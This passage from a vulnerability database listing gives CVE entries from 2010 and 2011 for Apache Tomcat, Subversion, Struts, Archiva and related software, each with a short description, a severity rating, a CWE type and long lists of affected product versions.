apache subversion 0.21.0
apache subversion 1.0.2
apache subversion 1.0.7
apache subversion 0.15
apache subversion 1.3.1
apache subversion 0.26.0
apache subversion 0.33.1
apache subversion *
apache subversion 0.10.1
apache subversion 0.13.2
apache subversion 0.13.0
apache subversion 1.1.4
apache subversion 0.17.1
apache subversion 0.19.1
apache subversion 1.0.1
apache subversion 1.1.0
apache subversion 1.6.5
apache subversion 0.20.0
apache subversion 0.20.1
apache subversion 0.24.0
apache subversion 1.5.7
apache subversion 0.37.0
apache subversion 0.11.1
apache subversion m2
apache subversion 0.22.2
apache subversion 0.18.1
apache subversion 1.6.4
apache subversion 1.6.9
apache subversion 1.0.9
apache subversion 1.5.4
apache subversion 1.1.3
apache subversion 1.4.2
apache subversion 0.19.0
apache subversion 1.2.0
apache subversion 1.4.5
apache subversion 0.16.1
apache subversion 0.14.1
apache subversion 1.1.1
apache subversion 1.2.2
apache subversion m4/m5
apache subversion 0.6
apache subversion 1.4.1
CVE-2010-5312 MEDIUM

Cross-site scripting (XSS) vulnerability in jquery.ui.dialog.js in the Dialog widget in jQuery UI before 1.10.0 allows remote attackers to inject arbitrary web script or HTML via the title option.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
fedoraproject fedora 35
drupal drupal *
debian debian_linux 9.0
fedoraproject fedora 36
netapp snapcenter -
debian debian_linux 7.0
jquery jquery_ui *
apache drill 1.16.0
CVE-2011-0013 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-0419 MEDIUM

Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
netbsd netbsd 5.1
apache http_server *
debian debian_linux 6.0
debian debian_linux 7.0
google android *
apache portable_runtime *
suse linux_enterprise_server 10
debian debian_linux 5.0
freebsd freebsd *
oracle solaris 10
apple mac_os_x 10.6.0
openbsd openbsd 4.8
CVE-2011-0533 MEDIUM

Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta; and Archiva 1.3.0 through 1.3.3 and 1.0 through 1.22 allows remote attackers to inject arbitrary web script or HTML via a crafted parameter, related to the autoIncludeParameters setting for the extremecomponents table.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache archiva 1.1.3
apache archiva 1.3
apache continuum 1.2.3.1
apache archiva 1.1.4
apache continuum 1.2
apache archiva 1.2
apache continuum 1.2.3
apache archiva 1.1.1
apache archiva 1.0.1
apache archiva 1.0.3
apache archiva 1.2.2
apache continuum 1.3.6
apache archiva 1.3.1
apache continuum 1.1
apache archiva 1.1
apache archiva 1.2.1
apache continuum 1.4.0
apache archiva 1.1.2
apache continuum 1.2.2
apache archiva 1.0
apache archiva 1.3.3
apache archiva 1.0.2
apache archiva 1.3.2
CVE-2011-0534 MEDIUM

Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 6.0.13
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.8
apache tomcat 6.0.18
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.6
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 6.0.3
apache tomcat 7.0.0
apache tomcat 6.0.14
apache tomcat 6.0.17
CVE-2011-0715 MEDIUM

The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache subversion 0.28.2
apache subversion 0.7
apache subversion 0.8
apache subversion 0.28.0
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 0.28.1
apache subversion 0.33.0
apache subversion 1.5.6
apache subversion 0.25.0
apache subversion 0.14.5
apache subversion 1.1.2
apache subversion 0.16
apache subversion 1.4.3
apache subversion 1.0.4
apache subversion 0.35.0
apache subversion 1.0.8
apache subversion 1.6.12
apache subversion 0.17.0
apache subversion 1.6.13
apache subversion 0.32.1
apache subversion 1.0.0
apache subversion 1.6.3
apache subversion 0.18.0
apache subversion 1.5.8
apache subversion 1.2.3
apache subversion 0.13.1
apache subversion 1.0.5
apache subversion 1.5.5
apache subversion 0.22.0
apache subversion 1.6.0
apache subversion 0.23.0
apache subversion m3
apache subversion 1.5.2
apache subversion 0.12.0
apache subversion 0.14.0
apache subversion 1.6.8
apache subversion 1.2.1
apache subversion 0.14.3
apache subversion 0.27.0
apache subversion 1.4.6
apache subversion 0.14.4
apache subversion 0.10.0
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.3.0
apache subversion 1.6.10
apache subversion 0.35.1
apache subversion 0.24.1
apache subversion 1.0.3
apache subversion 1.6.1
apache subversion 0.31.0
apache subversion 0.30.0
apache subversion 0.36.0
apache subversion 1.4.0
apache subversion 0.10.2
apache subversion 0.22.1
apache subversion 0.9
apache subversion 1.3.2
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion m1
apache subversion 1.0.6
apache subversion 0.29.0
apache subversion 1.6.11
apache subversion 0.14.2
apache subversion 0.24.2
apache subversion 0.34.0
apache subversion 0.21.0
apache subversion 1.0.2
apache subversion 1.0.7
apache subversion 0.15
apache subversion 1.3.1
apache subversion 0.26.0
apache subversion 0.33.1
apache subversion *
apache subversion 0.10.1
apache subversion 0.13.2
apache subversion 0.13.0
apache subversion 1.1.4
apache subversion 0.17.1
apache subversion 0.19.1
apache subversion 1.0.1
apache subversion 1.1.0
apache subversion 1.6.5
apache subversion 1.6.14
apache subversion 0.20.0
apache subversion 0.20.1
apache subversion 0.24.0
apache subversion 1.5.7
apache subversion 0.37.0
apache subversion 0.11.1
apache subversion m2
apache subversion 0.22.2
apache subversion 0.18.1
apache subversion 1.6.4
apache subversion 1.6.9
apache subversion 1.0.9
apache subversion 1.5.4
apache subversion 1.1.3
apache subversion 1.4.2
apache subversion 0.19.0
apache subversion 1.2.0
apache subversion 1.4.5
apache subversion 0.16.1
apache subversion 0.14.1
apache subversion 1.1.1
apache subversion 1.2.2
apache subversion m4/m5
apache subversion 0.6
apache subversion 1.4.1
CVE-2011-1026 MEDIUM

Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache archiva 1.1.3
apache archiva 1.3
apache archiva 1.1.4
apache archiva 1.2
apache archiva 1.1.1
apache archiva 1.0.1
apache archiva 1.0.3
apache archiva 1.2-m1
apache archiva 1.2.2
apache archiva 1.3.1
apache archiva 1.1
apache archiva 1.2.1
apache archiva 1.1.2
apache archiva 1.3.4
apache archiva 1.0
apache archiva 1.3.3
apache archiva 1.0.2
apache archiva 1.3.2
CVE-2011-1077 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache archiva 1.1.3
apache archiva 1.3
apache archiva 1.1.4
apache archiva 1.2
apache archiva 1.1.1
apache archiva 1.0.1
apache archiva 1.0.3
apache archiva 1.2-m1
apache archiva 1.2.2
apache archiva 1.3.1
apache archiva 1.1
apache archiva 1.2.1
apache archiva 1.1.2
apache archiva 1.3.4
apache archiva 1.0
apache archiva 1.3.3
apache archiva 1.0.2
apache archiva 1.3.2
CVE-2011-1088 MEDIUM

Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.9
apache tomcat 7.0.2
apache tomcat 7.0.7
apache tomcat 7.0.1
apache tomcat 7.0.6
apache tomcat 7.0.5
apache tomcat 7.0.3
apache tomcat 7.0.0
apache tomcat 7.0.8
CVE-2011-1183 MEDIUM

Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 7.0.11
CVE-2011-1184 MEDIUM

The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-1419 MEDIUM

Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.9
apache tomcat 7.0.2
apache tomcat 7.0.7
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.5
apache tomcat 7.0.3
apache tomcat 7.0.0
apache tomcat 7.0.8
CVE-2011-1475 MEDIUM

The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.3
apache tomcat 7.0.8
apache tomcat 7.0.9
apache tomcat 7.0.2
apache tomcat 7.0.7
apache tomcat 7.0.11
apache tomcat 7.0.5
apache tomcat 7.0.0
CVE-2011-1498 MEDIUM

Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache httpclient 4.1
apache httpclient 4.0
apache httpclient 4.0.1
CVE-2011-1582 MEDIUM

Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.12
apache tomcat 7.0.13
CVE-2011-1752 MEDIUM

The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
fedoraproject fedora 14
debian debian_linux 5.0
apple mac_os_x *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
apache subversion *
fedoraproject fedora 15
canonical ubuntu_linux 11.04
CVE-2011-1772 LOW

Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.0.9
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.0.7
apache struts 2.1.5
apache struts 2.0.8
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
opensymphony xwork *
apache struts 2.0.1
apache struts 2.0.3
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.1.4
apache struts 2.0.5
opensymphony webwork *
apache struts 2.1.6
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.0.12
apache struts 2.1.2
apache struts 2.0.14
apache struts 2.0.0
CVE-2011-1783 MEDIUM

The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
fedoraproject fedora 14
debian debian_linux 5.0
apple mac_os_x *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
apache subversion *
fedoraproject fedora 15
canonical ubuntu_linux 11.04
CVE-2011-1921 MEDIUM

The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache subversion 1.5.5
apache subversion 1.5.7
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.6.6
apache subversion 1.5.3
apache subversion 1.5.2
apache subversion 1.6.11
apache subversion 1.5.0
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 1.6.9
apache subversion 1.5.4
apache subversion 1.5.6
apache subversion 1.6.7
apache subversion 1.6.10
apache subversion 1.6.12
apache subversion 1.6.1
apache subversion 1.6.13
apache subversion 1.6.3
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
apache subversion 1.6.14
CVE-2011-1928 MEDIUM

The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache apr-util 1.4.4
apache http_server 2.2.18
apache apr-util 1.4.3
CVE-2011-2087 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.0.9
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.0.7
apache struts 2.1.5
apache struts 2.0.8
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.1
apache struts 2.0.3
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.1.4
apache struts 2.0.5
apache struts 2.1.6
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.0.12
apache struts 2.1.2
apache struts 2.0.14
apache struts 2.0.0
CVE-2011-2088 MEDIUM

XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
opensymphony xwork -
opensymphony webwork -
apache struts 2.2.1
opensymphony xwork 2.2.1
CVE-2011-2204 LOW

Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-2329 MEDIUM

The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache rampart/c 1.3.0
CVE-2011-2481 MEDIUM

Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 7.0.4
apache tomcat 7.0.14
apache tomcat 7.0.1
apache tomcat 7.0.13
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.3
apache tomcat 7.0.8
apache tomcat 7.0.9
apache tomcat 7.0.2
apache tomcat 7.0.7
apache tomcat 7.0.12
apache tomcat 7.0.11
apache tomcat 7.0.5
apache tomcat 7.0.0
CVE-2011-2487 MEDIUM

The implementations of PKCS#1 v1.5 key transport mechanism for XMLEncryption in JBossWS and Apache WSS4J before 1.6.5 is susceptible to a Bleichenbacher attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-327,

Products Affected

Vendor Product Version
redhat jboss_enterprise_web_platform 5.0.0
redhat jboss_portal 4.0.0
redhat jboss_web_services -
redhat jboss_enterprise_application_platform_text-only_advisories -
redhat jboss_enterprise_soa_platform 4.3.0
apache cxf *
redhat jboss_enterprise_soa_platform 4.2.0
redhat jboss_middleware_text-only_advisories -
redhat jboss_enterprise_application_platform 5.0.0
apache wss4j *
redhat jboss_business_rules_management_system 5.3
CVE-2011-2516 MEDIUM

Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache xml_security_for_c++ 1.6.0
shibboleth shibboleth-sp 2.3
shibboleth shibboleth-sp 2.4.1
shibboleth shibboleth-sp 1.3.2
shibboleth shibboleth-sp 2.1
shibboleth shibboleth-sp 2.2.1
shibboleth shibboleth-sp 2.4
shibboleth shibboleth-sp *
shibboleth shibboleth-sp 1.3f
shibboleth shibboleth-sp 1.3.3
shibboleth shibboleth-sp 1.3.1
shibboleth shibboleth-sp 1.3.4
shibboleth shibboleth-sp 1.3.5
shibboleth shibboleth-sp 2.0
shibboleth shibboleth-sp 2.3.1
shibboleth shibboleth-sp 2.2
CVE-2011-2526 MEDIUM

Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 5.5.33
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 5.5.32
apache tomcat 6.0.32
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 7.0.11
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 5.5.24
apache tomcat 7.0.0
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 7.0.4
apache tomcat 5.5.28
apache tomcat 6.0.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 6.0.30
apache tomcat 5.5.4
apache tomcat 7.0.1
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.5.30
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 5.5.31
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2011-2712 LOW

Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

